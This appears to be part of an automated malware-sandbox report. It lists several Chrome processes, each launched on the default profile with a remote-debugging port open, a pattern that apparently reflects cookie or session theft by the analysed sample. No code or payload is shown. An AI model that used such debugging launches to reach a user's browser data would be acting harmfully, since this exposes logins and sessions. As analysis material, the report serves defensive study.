                                                                                                                                          Imagebase:0x7ff7ea9f0000
                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                          Has elevated privileges:
                                                                                                                                          Has administrator privileges:
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:16
                                                                                                                                          Start time:09:03:13
                                                                                                                                          Start date:19/03/2025
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                          Imagebase:0x7ff7ea9f0000
                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                          Has elevated privileges:
                                                                                                                                          Has administrator privileges:
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:17
                                                                                                                                          Start time:09:04:10
                                                                                                                                          Start date:19/03/2025
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                          Imagebase:0x7ff7ea9f0000
                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                          Has elevated privileges:
                                                                                                                                          Has administrator privileges:
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:18
                                                                                                                                          Start time:09:04:24
                                                                                                                                          Start date:19/03/2025
                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                          Imagebase:0x7ff7ea9f0000
                                                                                                                                          File size:3'388'000 bytes
                                                                                                                                          MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                                                                          Has elevated privileges:
                                                                                                                                          Has administrator privileges:
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:false

Target ID:19
Start time:09:04:57
Start date:19/03/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:
File size:3'388'000 bytes
MD5 hash:E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:20
Start time:09:05:41
Start date:19/03/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:
File size:3'388'000 bytes
MD5 hash:E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

No disassembly